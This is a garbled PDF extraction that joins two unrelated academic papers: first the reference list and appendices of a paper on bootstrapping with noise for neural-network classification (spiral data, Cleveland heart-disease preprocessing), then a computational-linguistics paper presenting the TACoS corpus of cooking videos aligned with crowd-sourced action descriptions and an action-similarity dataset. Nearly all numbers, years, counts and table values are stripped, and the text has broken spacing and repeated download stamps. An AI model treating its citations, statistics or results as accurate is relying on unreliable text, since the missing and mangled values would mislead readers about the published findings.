( ) training w ith noise is equivalent to tikhonov regularization. n eural c omputation, , ± . brazdil, p. & henery, r. ( ) analysis of results. in d . m ichie, d . j. spiegelhalter & c . c . taylor (e ds), m achine learning, n eural and statistical c lassi® cation. n ew york: ellis h orwood, pp. ± . breim an, l. ( ) bagging predictors. technical report tr- , d epartm ent of statistics, u niversity of c alifornia, berkeley, c a. d effuant, g . ( ) an algorithm for building regularized, piecewise linear discrimination surfaces: the perceptron m embrane. n eural computation , , ± . d etrano, r. ( ) accuracy curves: an alternative graphical representation of probability data. journal of clinical epidem iology, , ± . d etrano, r., janosi, a., steinbru nn, w ., p ® sterer, m ., schm id, j., sandhu, s., guppy, k ., lee, s. & froelicher, v. ( ) international application of a new probability algorithm for the diagnosis of coronary artery disease. am erican journal of c ardiology, , ± . e fron, b. & tibshirani, r. ( ) an introduction to the bootstrap. n ew york: c hapm an and h all. fahlm an, s.e . ( ) fast-learn ing variations on back-propagation: an empirical study. in d . t ouretzky, g . h inton & t. sejnow ski (e ds), proceedings of the connectionist m odels summ er school. san m ateo, c a: m organ k aufmann, pp. ± . fahlm an, s.e. & lebiere, c . ( ) the cascade-c orrelation l earning architectu re. c m u-cs- - , c arnegie m ellon u niversity, pittsburgh, pa. g em an, s., bienenstock, e . & d oursat, r. ( ) n eural networks and the bias-variance dilem m a. n eural c omputation, , ± . g ennari, j.h ., l angley, p. & fisher, d . ( ) m odels of incremental concept formation. arti® cial intelligence, , ± . g oodenough, d .j., rossm ann, k . & l usted, l.b. ( ) radiographic applications of receiver operating characteristic (ro c ) curves. radiology, , ± . hanley, j.a. & m cn eil, b.j. ( ) the m eaning and use of the area under a receiver operating characteristic (ro c ) curve. radiology, , ± . hansen, l.k . & salamon, p. ( ) n eural networks ensem bles. ieee transactions on pattern analysis and m achine intelligence, , ± . hastie, t. & tibshirani, r. ( ) generalized additive m odels. statistica l science , , ± . hastie, t. & tibshirani, r. ( ) generalized a dditive m odels. london: c hapm an and h all. henderson, a.r. ( ) assessin g test accuracy and its clinical consequences: a prim er for receiver operating characteristic curve analysis. annals of c linical biochem istry, , ± . hoaglin, d .c ., m osteller, f. & t ukey, j.w . ( ) u nderstand ing r obust and exploratory d ata analysis. n ew york: w iley. hogg, r.v. & c raig, a.t. ( ) introduction to m athem atical statistics ( rd edn). t oronto, c anada: m acm illan. d ow nl oa de d by [ ] a t : s ep te m be r bootstrapping w ith n oise k rogh, a. & h ertz, j.a. ( ) a sim ple weight decay can improve generalization. in j. e. m oody, s. j. hanson & r. p. lippmann (eds), advances in n eural information processing systems, vol. . san m ateo, c a: m organ k aufm ann, pp. ± . l ang, k .j. & w itbrock, m .j. ( ) learning to tell two spirals apart. in d . s. touretzky, j. l . e llman, t . j. sejnowski & g. e. hin ton (e ds), p roceedings of the connectionists m odels, pp. ± . l ehm ann, e.l. ( ) n onparametrics: statistical m ethods based on ranks. san francisco, c a: h olden and d ay. l ippm ann, r.p., k ukolich, l . & shahian, d . ( ) predicting the risk of com plications in coronary artery bypass operations using neural networks. in g. t esauro, d . 
touretzky & t. l een (eds), a dvances in n eural information p rocessing system s, v ol. . c ambridge, m a: m it press, pp. ± . m urphy, p.m . & aha, d .w . ( ) uc i repository of m achine learning databases. d epartment of information and c om puter science, u niversity of c alifornia at irvine. perrone, m .p. ( ) improving regression estim ation: averagin g m ethods for variance reduction with extension s to general c onvex m easure optim ization. phd thesis, brow n u niversity, institute for brain and n eural systems, providence, ri. ripley, b.d . ( ) pattern recognition and n eural n etworks. o xford press. sietsma, j. & d ow, r.j.f. ( ) c reating arti® cial neural netw orks that generalize. n eural networks, , ± . stensmo, m . ( ) adaptive autom ated diagnosis. phd thesis, royal institute of technology, stockholm , sw eden. u ltragem d ata m ining (u d m ) ( ) esprit statlog benchm arks. technical report, boulder c reek, c a. w olpert, d .h . ( ) stacked generalization. n eural n etworks, , ± . a pp end ix a: the sp ira l d ata t he two-dim ensional spiral data (lang & w itbrock, ) are given b y a vector ( x i , y i ) de® ned by: x i r i cos ( a i k p / ), y i r i sin ( a i k p / ) (a ) wh ere a i p i / , r i . i / , i , . . . , (a ) and k fo r one class and fo r the other class. a pp end ix b: d etails a nd pre-pro cessing of the c le velan d h eart d a ta t he data in the u c i repo sitory contain variab les out of abo ut that were in the original study. t he task is to predict the existence of a coronary artery disease (c ad ) based on the m easurem ents. d ata fo r p atients were obtained; % of the patients were diagnosed with c a d . t he variabl e attributes are: ( ) a ge ( ) sex ( ) chest p ain typ e ( valu esÐ converted to binary variab les) ( ) resting bloo d pressu re ( ) serum cholesterol in m g dl ( ) fasting bloo d su gar . m g dl ( ) resting electrocardiograp hic resu lts (values , , ) ( ) m axim um h eart rate achieved ( ) exercise-induced angina ( ) oldpeak st depressio n induced b y exercise relative to rest d ow nl oa de d by [ ] a t : s ep te m be r y. r aviv & n . intrator ( ) the slo pe of the peak exercise st segm ent (converted to binary variab les) ( ) n um b er of m ajor vesse ls ( ± ) coloured by ¯ ouroscopy (converted to binary variables) ( ) thal: norm al; ® xed defect; reversible defect (converted to binary variables) w e h ave added dum m y variab les to replace the categorial and ordinal variab les fo r variab les , , and and therefore w orked with independent variab les. t he continuous variabl es , , , and were sph ered (standard ized) by setting the m ean of each of the variabl es to zero w ith unit varian ce. this step was necessary as the data contain variab les that are on differen t scales, su ch as age and bloo d pressu re. the original data contain attributes and h ave m any m issing valu es. the data used in most of the b enchmarks have only attributes and a fe w m issin g valu es wh ich we sim p ly replaced by their unconditional expectations. th e addition of dumm y variab les and data sp hering had a dram atic effe ct on the classi® cation resu lts. d ow nl oa de d by [ ] a t : s ep te m be r transactions of the association for computational linguistics, ( ) – . action editor: hal daumé iii. submitted / ; published / . c© association for computational linguistics. 
transactions of the association for computational linguistics, ( ) – . action editor: hal daumé iii. submitted / ; published / . © association for computational linguistics.

grounding action descriptions in videos
michaela regneri, marcus rohrbach, dominikus wetzel, stefan thater, bernt schiele and manfred pinkal
department of computational linguistics, saarland university, saarbrücken, germany (regneri|dwetzel|stth|pinkal)@coli.uni-saarland.de
max planck institute for informatics, saarbrücken, germany (rohrbach|schiele)@mpi-inf.mpg.de

abstract recent work has shown that the integration of visual information into text-based models can substantially improve model predictions, but so far only visual information extracted from static images has been used. in this paper, we consider the problem of grounding sentences describing actions in visual information extracted from videos. we present a general purpose corpus that aligns high quality videos with multiple natural language descriptions of the actions portrayed in the videos, together with an annotation of how similar the action descriptions are to each other. experimental results demonstrate that a text-based model of similarity between actions improves substantially when combined with visual information from videos depicting the described actions.

introduction
the estimation of semantic similarity between words and phrases is a basic task in computational semantics. vector-space models of meaning are one standard approach. following the distributional hypothesis, frequencies of context words are recorded in vectors, and semantic similarity is computed as a proximity measure in the underlying vector space. such distributional models are attractive because they are conceptually simple, easy to implement and relevant for various nlp tasks (turney and pantel, ). at the same time, they provide a substantially incomplete picture of word meaning, since they ignore the relation between language and extra-linguistic information, which is constitutive for linguistic meaning. in the last few years, a growing amount of work has been devoted to the task of grounding meaning in visual information, in particular by extending the distributional approach to jointly cover texts and images (feng and lapata, ; bruni et al., ). as a clear result, visual information improves the quality of distributional models. bruni et al. ( ) show that visual information drawn from images is particularly relevant for concrete common nouns and adjectives. a natural next step is to integrate visual information from videos into a semantic model of event and action verbs. psychological studies have shown the connection between action semantics and videos (glenberg, ; howell et al., ), but to our knowledge, we are the first to provide a suitable data source and to implement such a model. the contribution of this paper is three-fold:
• we present a multimodal corpus containing textual descriptions aligned with high-quality videos. starting from the video corpus of rohrbach et al. ( b), which contains high-resolution video recordings of basic cooking tasks, we collected multiple textual descriptions of each video via mechanical turk. we also provide an accurate sentence-level alignment of the descriptions with their respective videos. we expect the corpus to be a valuable resource for computational semantics, and moreover helpful for a variety of purposes, including video understanding and generation of text from videos.
• we provide a gold-standard dataset for the evaluation of similarity models for action verbs and phrases. the dataset has been designed as analogous to the usage similarity dataset of erk et al. ( ) and contains pairs of natural-language action descriptions plus their associated video segments. each of the pairs is annotated with a similarity score based on several manual annotations.
• we report an experiment on similarity modeling of action descriptions based on the video corpus and the gold standard annotation, which demonstrates the impact of scene information from videos. visual similarity models outperform text-based models; the performance of combined models approaches the upper bound indicated by inter-annotator agreement.

the paper is structured as follows: we first place ourselves in the landscape of related work (sec. ), then we introduce our corpus (sec. ). sec. reports our action similarity annotation experiment and sec. introduces the similarity measures we apply to the annotated data. we outline the results of our evaluation in sec. , and conclude the paper with a summary and directions for future work (sec. ).

related work
a large multimodal resource combining language and visual information resulted from the esp game (von ahn and dabbish, ). the dataset contains many images tagged with several one-word labels. the microsoft video description corpus (chen and dolan, , msvd) is a resource providing textual descriptions of videos. it consists of multiple crowd-sourced textual descriptions of short video snippets. the msvd corpus is much larger than our corpus, but most of the videos are of relatively low quality and therefore too challenging for state-of-the-art video processing to extract relevant information. the videos are typically short and summarized with a single sentence. our corpus contains coherent textual descriptions of longer video sequences, where each sentence is associated with a timeframe. gupta et al. ( ) present another useful resource: their model learns the alignment of predicate-argument structures with videos and uses the result for action recognition in videos. however, the corpus contains no natural language texts. the connection between natural language sentences and videos has so far been mostly explored by the computer vision community, where different methods for improving action recognition by exploiting linguistic data have been proposed (gupta and mooney, ; motwani and mooney, ; cour et al., ; tzoukermann et al., ; rohrbach et al., b, among others). our resource is intended to be used for action recognition as well, but in this paper, we focus on the inverse effect of visual data on language processing. feng and lapata ( ) were the first to enrich topic models for newspaper articles with visual information, by incorporating features from article illustrations. they achieve better results when incorporating the visual information, providing an enriched model that pairs a single text with a picture. bruni et al. ( ) used the esp game data to create a visually grounded semantic model. their results outperform purely text-based models using visual information from pictures for the task of modeling noun similarities. they model single words, and mostly visual features lead only to moderate improvements, which might be due to the mixed quality and random choice of the images. dodge et al. ( ) recently investigated which words can actually be grounded in images at all, producing an automatic classifier for visual words. an interesting in-depth study by mathe et al.
( ) automatically learnt the semantics of motion verbs as abstract features from videos. the study captures actions with - videos for each of the actions, and would need a perfect object recognition from a visual classifier to scale up. steyvers ( ) and later silberer and lapata ( ) present an alternative approach to incorporating visual information directly: they use so-called feature norms, which consist of human associations for many given words, as a proxy for general perceptual information. because this model is trained and evaluated on those feature norms, it is not directly comparable to our approach. the restaurant game by orkin and roy ( ) grounds written chat dialogues in actions carried out in a computer game. while this work is outstanding from the social learning perspective, the actions that ground the dialogues are clicks on a screen rather than real-world actions. the dataset has successfully been used to model determiner meaning (reckman et al., ) in the context of the restaurant game, but it is unclear how this approach could scale up to content words and other domains.

the tacos corpus
we build our corpus on top of the "mpii cooking composite activities" video corpus (rohrbach et al., b, mpii composites), which contains videos of different activities in the cooking domain, e.g., preparing carrots or separating eggs. we extend the existing corpus with multiple textual descriptions collected by crowd-sourcing via amazon mechanical turk (mturk; mturk.com). to facilitate the alignment of sentences describing activities with their proper video segments, we also obtained approximate timestamps, as described in sec. . . mpii composites comes with timed gold-standard annotation of low-level activities and participating objects (e.g. open [hand,drawer] or take out [hand,knife,drawer]). by adding textual descriptions (e.g., the person takes a knife from the drawer) and aligning them on the sentence level with videos and low-level annotations, we provide a rich multimodal resource (cf. fig. ), the "saarbrücken corpus of textually annotated cooking scenes" (tacos). in particular, the tacos corpus provides:
• a collection of coherent textual descriptions for video recordings of activities of medium complexity, as a basis for empirical discourse-related research, e.g., the selection and granularity of action descriptions in context
• a high-quality alignment of sentences with video segments, supporting the grounding of action descriptions in visual information
• collections of paraphrases describing the same scene, which result as a by-product from the text-video alignment and can be useful for text generation from videos (among other things)
• the alignment of textual activity descriptions with sequences of low-level activities, which may be used to study the decomposition of action verbs into basic activity predicates

we expect that our corpus will encourage and enable future work on various topics in natural language and video processing. in this paper, we will make use of the second aspect only, demonstrating the usefulness of the corpus for the grounding task. after a more detailed description of the basic video corpus and its annotation (sec. . ) we describe the collection of textual descriptions with mturk (sec. . ), and finally show the assembly and some benchmarks of the final corpus (sec. . ).

the video corpus
mpii composites contains high resolution video recordings of - minutes length ( . min. on average).
basic cooking tasks such as cutting a cucumber were recorded, each between and times. the selection of cooking tasks is based on those proposed at "jamie's home cooking skills" (www.jamieshomecookingskills.com). the corpus is recorded in a kitchen environment with a total of subjects. each video depicts a single task executed by an individual subject. the dataset contains expert annotations of low-level activity tags. annotations are provided for segments containing a semantically meaningful cooking related movement pattern. the action must go beyond single body part movements (such as move arm up) and must have the goal of changing the state or location of an object. different activity labels are used for annotation (e.g. peel, stir, trash). each low-level activity tag consists of an activity label (peel), a set of associated objects (carrot, drawer, ...), and the associated timeframe (starting and ending points of the activity). associated objects are the participants of an activity, namely tools (e.g. knife), patient (carrot) and location (cutting-board). we provide the coarse-grained role information for patient, location and tool in the corpus data, but we did not use this information in our experiments. the dataset contains a total of annotated segments, on average per video.

collecting textual video descriptions
we collected textual descriptions for a subset of the videos in mpii composites, restricting collection to tasks that involve manipulation of cooking ingredients. we also excluded tasks with fewer than four video recordings in the corpus, leaving tasks to be described. we randomly selected five videos from each task, except the three tasks for which only four videos are available. this resulted in a total of videos. for each video, we collected different textual descriptions, leading to annotation assignments. we published these assignments (hits) on mturk, using an adapted version of the annotation tool vatic (vondrick et al., ; github.com/marcovzla/vatic/tree/bolt). in each assignment, the subject saw one video specified with the task title (e.g. how to prepare an onion), and then was asked to enter at least five and at most complete english sentences to describe the events in the video. the annotation instructions contained example annotations from a kitchen task not contained in our actual dataset. annotators were encouraged to watch each video several times, skipping backward and forward as they wished. they were also asked to take notes while watching, and to sketch the annotation before entering it. once familiarized with the video, subjects did the final annotation by watching the entire video from beginning to end, without the possibility of further non-sequential viewing. subjects were asked to enter each sentence as soon as the action described by the sentence was completed. the video playback paused automatically at the beginning of the sentence input. we recorded pause onset for each sentence annotation as an approximate ending timestamp of the described action. the annotators resumed the video manually. the tasks required a hit approval rate of % and were open only to workers in the us, in order to increase the general language quality of the english annotations. each task paid . usd. before paying we randomly inspected the annotations and manually checked for quality. the total costs of collecting the annotations amounted to , usd. the data was obtained within a time frame of . weeks.
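for concreteness, one way the expert low-level activity tags described above (activity label, associated objects, timeframe and coarse-grained roles) could be represented in code; the field names, types and the example values are illustrative assumptions, not the corpus' actual file format.

```python
from dataclasses import dataclass
from typing import List, Optional

@dataclass
class ActivityTag:
    """one expert-annotated low-level activity segment."""
    label: str                      # e.g. "peel", "stir", "trash"
    objects: List[str]              # associated participants, e.g. ["hand", "carrot"]
    start: float                    # starting point of the segment (seconds)
    end: float                      # ending point of the segment (seconds)
    tool: Optional[str] = None      # coarse-grained roles provided in the corpus data
    patient: Optional[str] = None
    location: Optional[str] = None

# hypothetical example:
# ActivityTag("cut", ["knife", "carrot", "cutting board"], 41.2, 47.8,
#             tool="knife", patient="carrot", location="cutting board")
```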
putting the tacos corpus together
our corpus is a combination of the mturk data and mpii composites, created by filtering out inappropriate material and computing a high-quality alignment of sentences and video segments. the alignment is done by matching the approximate timestamps of the mturk data to the accurate timestamps in mpii composites.

figure : aligning action descriptions with the video (elementary timeframes l –l mapped to sentences s –s ).

we discarded text instances if people did not time the sentences properly, taking the association of several (or even all) sentences to a single timestamp as an indicator. whenever we found a timestamp associated with two or more sentences, we discarded the whole instance. overall, we had to filter out % of the text instances, which left us with textual video descriptions. for the alignment of sentence annotations and video segments, we assign a precise timeframe to each sentence in the following way: we take the timeframes given by the low-level annotation in mpii composites as a gold standard micro-event segmentation of the video, because they mark all distinct frames that contain activities of interest. we call them elementary frames. the sequence of elementary frames is not necessarily continuous, because idle time is not annotated. the mturk sentences have end points that constitute a coarse-grained, noisy video segmentation, assuming that each sentence spans the time between the end of the previous sentence and its own ending point. we refine those noisy timeframes to gold frames as shown in fig. : each elementary frame (l -l ) is mapped to a sentence (s -s ) if its noisy timeframe covers at least half of the elementary frame. we define the final gold sentence frame then as the timespan between the starting point of the first and the ending point of the last elementary frame. the alignment of descriptions with low-level activities results in a table as given in fig. . columns contain the textual descriptions of the videos; rows correspond to low-level actions, and each sentence is aligned with the last of its associated low-level actions. as a side effect, we also obtain multiple paraphrases for each sentence, by considering all sentences with the same associated time frame as equivalent realizations of the same action.

figure : most frequent verbs and low-level actions in the tacos corpus (pan is probably often mis-tagged).
top verbs: cut, take, get, put, wash, place, rinse, remove, *pan, peel
top activities: move, take out, cut, wash, take apart, add, shake, screw, put in, peel

the corpus contains , action descriptions (tokens), realizing , different sentences (types). it consists of , words (tokens), , of which are content word instances (i.e. nouns, verbs and adjectives). the verb vocabulary comprises , verb tokens, realizing lemmas. since verbs occurring in the corpus typically describe actions, we can note that the linguistic variance for the different low-level activities is quite large. fig. gives an impression of the action realizations in the corpus, listing the most frequent verbs from the textual data, and the most frequent low-level activities. on average, each description covers . low-level activities, which indicates a clear difference in granularity. % of the descriptions correspond to exactly one low-level activity, about a quarter ( %) covers two of them; % have or more low-level elements, % more than .
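a minimal sketch of the timestamp-based alignment rule described above: an elementary frame is assigned to a sentence when the sentence's noisy timeframe covers at least half of it, and the gold sentence frame then spans from the first to the last assigned elementary frame. the list-of-(start, end) data structures are illustrative assumptions of this sketch.

```python
def align_sentences(noisy_frames, elementary_frames):
    """noisy_frames: one (start, end) per sentence; elementary_frames: sorted (start, end) tuples.
    returns one gold (start, end) frame per sentence, or None if no elementary frame was assigned."""
    assigned = [[] for _ in noisy_frames]
    for ef_start, ef_end in elementary_frames:
        ef_len = ef_end - ef_start
        for s, (ns, ne) in enumerate(noisy_frames):
            overlap = max(0.0, min(ne, ef_end) - max(ns, ef_start))
            # map the elementary frame to the sentence covering at least half of it
            if ef_len > 0 and overlap >= 0.5 * ef_len:
                assigned[s].append((ef_start, ef_end))
                break
    gold = []
    for frames in assigned:
        # gold frame: start of the first to end of the last assigned elementary frame
        gold.append((frames[0][0], frames[-1][1]) if frames else None)
    return gold
```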
the corpus shows how humans vary the granularity of their descriptions, measured in time or number of low-level activities, and it shows how they vary the linguistic realization of the same action. for example, fig. contains dice and chop into small pieces as alternative realizations of the low-level activity sequence slice - scratch off - slice. the descriptions are of varying length ( words on average), reaching from two-word phrases to detailed descriptions of words. most sentences are short, consisting of a reference to the person in the video, a participant and an action verb (the person rinses the carrot, he cuts off the two edges). people often specified an instrument (from the faucet), or the resulting state of the action (chop the carrots in small pieces). occasionally, we find more complex constructions (support verbs, coordinations). as fig. indicates, the timestamp-based alignment is pretty accurate; occasional errors occur like he starts chopping the carrot... in nl sequence . the data contains some typos and ungrammatical sentences (he washed carrot), but for our own experiments, the small number of such errors did not lead to any processing problems.

the action similarity dataset
in this section, we present a gold standard dataset, as a basis for the evaluation of visually grounded models of action similarity. we call it the "action similarity dataset" (asim) in analogy to the usage similarity dataset (usim) of erk et al. ( ) and erk et al. ( ). similarly to usim, asim contains a collection of sentence pairs with numerical similarity scores assigned by human annotators. we asked the annotators to focus on the similarity of the activities described rather than on assessing semantic similarity in general. we use sentences from the tacos corpus and record their timestamps. thus each sentence comes with the video segment which it describes (these were not shown to the annotators).

selecting action description pairs
random selection of annotated sentences from the corpus would lead to a large majority of pairs which are completely dissimilar, or difficult to grade (e.g., he opens the drawer – the person cuts off the ends of the carrot). we constrained the selection process in two ways: first, we consider only sentences describing activities of manipulating an ingredient. the low-level annotation of the video corpus helps us identify candidate descriptions. we exclude rare and special activities, ending up with cut, slice, chop, peel, take apart, and wash, which occur reasonably frequently, with a wide distribution over different scenarios. we restrict the candidate set to those sentences whose timespan includes one of these activities. this results in a conceptually more focussed repertoire of descriptions, and at the same time admits full linguistic variation (wash an apple under the faucet – rinse an apple, slice the cucumber – cut the cucumber into slices).
figure : corpus overview. videos of basic kitchen tasks; low-level annotations with timestamps, actions and objects (manual low-level annotation); natural language descriptions with ending times of the actions (mechanical turk data collection); linked by the timestamp-based alignment. example low-level annotations: wash [hand,carrot]; shake [hand,carrot]; close [hand,drawer]; take out [hand,knife,drawer]; move [hand,cutting board,counter]; move [hand,carrot,bowl,cutting board]; cut [knife,carrot,cutting board]; slice [knife,carrot,cutting board]. example descriptions: "the man takes out a cutting board." / "he washes a carrot." / "he takes out a knife." / "he slices the carrot."

figure : excerpt from the corpus for a video on preparing a carrot. example frames, low-level annotation (action and participants) is shown along with three of the mturk sequences (nl sequence - ). the rows show the actions with their participants and the aligned descriptions:
wash [hand, carrot]: "he washed carrot" / "the person rinses the carrot." / "he rinses the carrot from the faucet."
cut [knife, carrot, cutting board]: "he cut off ends of carrots" / "the person cuts off the ends of the carrot." / "he cuts off the two edges."
open [hand, drawer]
close [hand, drawer]: "he searches for something in the drawer, failed attempt, he throws away the edges in trash."
trash [hand, carrot]: "the person searches for the trash can, then throws the ends of the carrot away."
wash [hand, carrot]: "he rinses the carrot again."
shake [hand, carrot]: "he washed carrot" / "the person rinses the carrot again." / "he starts chopping the carrot in small pieces."
slice [knife, carrot, cutting board]
scratch off [hand, carrot, knife, cutting board]
slice [knife, carrot, cutting board]: "he diced carrots" / "he finished chopping the carrots in small pieces."

second, we required the pairs to share some lexical material, either the head verb or the manipulated ingredient (or both). more precisely, we composed the asim dataset from three different subsets:
different activity, same object: this subset contains pairs describing different types of actions carried out on the same type of object (e.g. the man washes the carrot. – she dices the carrot.). its focus is on the central task of modeling the semantic relation between actions (rather than the objects involved in the activity), since the object head nouns in the descriptions are the same, and the respective video segments show the same type of object.
same activity, same object: description pairs of this subset will in many cases, but not always, agree in their head verbs. the dataset is useful for exploring the degree to which action descriptions are underspecified with respect to the precise manner of their practical realization. for example, peeling an onion will mostly be done in a rather uniform way, while cut applied to carrot can mean that the carrot is chopped up, or sliced, or cut in halves.
same activity & verb, different object: description pairs in this subset share head verb and low-level activity, but have different objects (e.g. the man washes the carrot. – a girl washes an apple under the faucet.). this dataset enables the exploration of the objects' meaning contribution to the complete action, established by the variation of equivalent actions that are done to different objects.
we assembled action description pairs for annotation: pairs share the object; of which have different activities, and the other pairs share the same activity. we included paraphrases describing the same video segment, but we excluded pairs of identical sentences. additional pairs share their head verb, but have different objects.
manual annotation
three native speakers of english were asked to judge the similarity of the action pairs with respect to how they are carried out, rating each sentence pair with a score from (not similar at all) to (the same or nearly the same). (we refer to the latter with the term object; we don't require the ingredient term to be the actual grammatical object in the action descriptions, we rather use "object" in its semantic role sense as the entity affected by an action.) they did not see the respective videos, but we noted the relevant kitchen task (i.e. which vegetable was prepared). we asked the annotators explicitly to ignore the actor of the action (e.g. whether it is a man or a woman) and score the similarities of the underlying actions rather than their verbalizations. each subject rated all pairs, which were shown to them in completely random order, with a different order for each subject. we compute inter-annotator agreement (and the forthcoming evaluation scores) using spearman's rank correlation coefficient (ρ), a non-parametric test which is widely used for similar evaluation tasks (mitchell and lapata, ; bruni et al., ; erk and mccarthy, ). spearman's ρ evaluates how the samples are ranked relative to each other rather than the numerical distance between the rankings.

figure : average similarity ratings (sim), their standard deviation (σ) and annotator agreement (ρ) for asim.
part of gold standard | sim | σ | ρ
diff. activity, same object | . | . | .
same activity, same object | . | . | .
all with same object | . | . | .
same verb, diff. object | . | . | .
complete dataset | . | . | .

fig. shows the average similarity ratings in the different settings and the inter-annotator agreement. the average inter-rater agreement was ρ = . (averaged over pairwise rater agreements), with pairwise results of ρ = . , . , and . , respectively, which are all highly significant at p < . . as expected, pairs with the same activity and object are rated very similar ( . ) on average, while the similarity of different activities on the same object is the lowest ( . ). for both subsets, inter-rater agreement is high (ρ = . ), and even higher for both same object subsets together ( . ). pairs with identical head verbs and different objects have a small standard deviation, at . . the inter-annotator agreement on this set is much lower than for pairs from the same object set. this indicates that similarity assessment for different variants of the same activity is a hard task even for humans.

models of action similarity
in the following, we demonstrate that visual information contained in videos of the kind provided by the tacos corpus (sec. ) substantially contributes to the semantic modeling of action-denoting expressions. in sec. , we evaluate several methods for predicting action similarity on the task provided by the asim dataset. in this section, we describe the models considered in the evaluation. we use two different models based on visual information, and in addition two text based models. we will also explore the effect of combining linguistic and visual information and investigate which mode is most suitable for which kinds of similarity.

text-based models
we use two different models of textual similarity to predict action similarity: a simple word-overlap measure (jaccard coefficient) and a state-of-the-art model based on "contextualized" vector representations of word meaning (thater et al., ).
jaccard coefficient.
the jaccard coefficient gives the ratio between the number of (distinct) words common to two input sentences and the total number of (distinct) words in the two sentences. such simple surface-oriented measures of textual similarity are often used as baselines in related tasks such as recognizing textual entailment (dagan et al., ) and are known to deliver relatively strong results.
vector model. we use the vector model of thater et al. ( ), which "contextualizes" vector representations for individual words based on the particular sentence context in which the target word occurs. the basic intuition behind this approach is that the words in the syntactic context of the target word in a given input sentence can be used to refine or disambiguate its vector. intuitively, this allows us to discriminate between different actions that a verb can refer to, based on the different objects of the action. we first experimented with a version of this vector model which predicts action similarity scores of two input sentences by computing the cosine similarity of the contextualized vectors of the verbs in the two sentences only. we achieved better performance with a variant of this model which computes vectors for the two sentences by summing over the contextualized vectors of all constituent content words. in the experiments reported below, we only use the second variant. we use the same experimental setup as thater et al. ( ), as well as the parameter settings that are reported to work best in that paper.

video-based models
we distinguish two approaches to compute the similarity between two video segments. in the first, unsupervised approach we extract a video descriptor and compute similarities between these raw features (wang et al., ). the second approach builds upon the first by additionally learning higher level attribute classifiers (rohrbach et al., b) on a held out training set. the similarity between two segments is then computed between the classifier responses. in the following we detail both approaches:
raw visual features. we use the state-of-the-art video descriptor dense trajectories (wang et al., ) which extracts visual video features, namely histograms of oriented gradients, flow, and motion boundary histograms, around densely sampled and tracked points. this approach is especially suited for this data as it ignores non-moving parts in the video: we are interested in activities and manipulation of objects, and this type of feature implicitly uses only information in relevant image locations. for our setting this feature representation has been shown to be superior to human pose-based approaches (rohrbach et al., a). using a bag-of-words representation we encode the features using a , dimensional codebook. features and codebook are provided with the publicly available video dataset. we compute the similarity between two encoded features by computing the intersection of the two (normalized) histograms.
visual classifiers. visual raw features tend to have several dimensions in the feature space which provide unreliable, noisy values and thus degrade the strength of the similarity measure. intermediate level attribute classifiers can learn which feature dimensions are distinctive and thus significantly improve performance over raw features. rohrbach et al. ( b) showed that using such an attribute classifier representation can significantly improve performance for composite activity recognition.
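a minimal sketch of the two unsupervised similarity measures described in this section: the jaccard coefficient over the distinct words of two sentences, and the intersection of two normalized bag-of-words histograms for the video encodings. the whitespace tokenization and the numpy-based histogram handling are assumptions of this sketch, not the exact pipeline of the paper.

```python
import numpy as np

def jaccard(sentence_a, sentence_b):
    """ratio of distinct words common to both sentences to all distinct words in them."""
    a, b = set(sentence_a.lower().split()), set(sentence_b.lower().split())
    return len(a & b) / len(a | b) if (a | b) else 0.0

def histogram_intersection(hist_a, hist_b):
    """similarity of two bag-of-words video encodings as the intersection of the normalized histograms."""
    a = np.asarray(hist_a, dtype=float)
    b = np.asarray(hist_b, dtype=float)
    a_sum, b_sum = a.sum(), b.sum()
    if a_sum == 0 or b_sum == 0:
        return 0.0
    return float(np.minimum(a / a_sum, b / b_sum).sum())

# e.g. jaccard("he slices the carrot", "the person cuts the carrot into slices")
```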
figure : evaluation results in spearman's ρ. all values > . are significant at p < . .
model | same object | same verb | overall
text: jaccard | . | . | .
text: textual vectors | . | . | .
text: text combined | . | . | .
video: visual raw vectors | . | - . | .
video: visual classifier | . | . | .
video: video combined | . | - . | .
mix: all unsupervised | . | . | .
mix: all combined | . | . | .
upper bound | . | . | .

the relevant attributes are all activities and objects annotated in the video data (cf. section . ). for the experiments reported below we use the same setup as rohrbach et al. ( b) and use all videos in mpii composites and mpii cooking (rohrbach et al., a), excluding the videos used during evaluation. the real-valued svm-classifier output provides a confidence how likely a certain attribute appeared in a given video segment. this results in a -dimensional vector of classifier outputs for each video segment. to compute the similarity between two vectors we compute the cosine between them.

evaluation
we evaluate the different similarity models introduced in sec. by calculating their correlation with the gold-standard similarity annotations of asim (cf. sec. ). for all correlations, we use spearman's ρ as a measure. we consider the two textual measures (jaccard and textual vectors) and their combination, as well as the two visual models (visual raw vectors and visual classifier) and their combination. we also combined textual and visual features, in two variants: the first includes all models (all combined), the second only the unsupervised components, omitting the visual classifier (all unsupervised). to combine multiple similarity measures, we simply average their normalized scores (using z-scores). figure shows the scores for all of these measures on the complete asim dataset (overall), along with the two subparts, where description pairs share either the object (same object) or the head verb (same verb). in addition to the model results, the table also shows the average human inter-annotator agreement as upper bound. on the complete set, both visual and textual measures have a highly significant correlation with the gold standard, whereas the combination of both clearly leads to the best performance ( . ). the results on the same object and same verb subsets shed light on the division of labor between the two information sources. while the textual measures show a comparable performance over the two subsets, there is a dramatic difference in the contribution of visual information: on the same object set, the visual models clearly outperform the textual ones, whereas the visual information has no positive effect on the same verb set. this is clear evidence that the visual model does not capture the similarity of the participating objects but rather genuine action similarity, which the visual features (wang et al., ) we employ were designed for. a direction for future work is to learn dedicated visual object detectors to recognize and capture similarities between objects more precisely. the numbers shown in figure support this hypothesis, showing the two groups in the same object class: for sentence pairs that share the same activity, the textual models seem to be much more suitable than the visual ones. in general, visual models perform better on actions with different activity types, textual models on closely related activities.
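a minimal sketch of the combination and evaluation scheme described above: individual measures are normalized to z-scores and averaged, and predictions are scored against the gold asim ratings with spearman's ρ. the use of scipy, and scores kept as aligned arrays, are assumptions of this sketch.

```python
import numpy as np
from scipy.stats import spearmanr

def combine(measure_scores):
    """average the z-score-normalized outputs of several similarity measures.
    measure_scores: list of arrays, one array of scores per measure, aligned by item."""
    z = [(s - np.mean(s)) / np.std(s) for s in map(np.asarray, measure_scores)]
    return np.mean(z, axis=0)

def evaluate(predicted, gold):
    """correlation of predicted similarities with the gold asim ratings (spearman's rho)."""
    rho, p_value = spearmanr(predicted, gold)
    return rho, p_value
```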
figure : results for sentences with the same object, with either the same or different low-level activity.
model (same object) | same action | diff. action
text: jaccard | . | .
text: text vectors | . | .
text: text combined | . | .
video: vis. raw vectors | . | .
video: vis. classifier | . | .
video: video combined | . | .
mix: all unsupervised | . | .
mix: all combined | . | .
upper bound | . | .

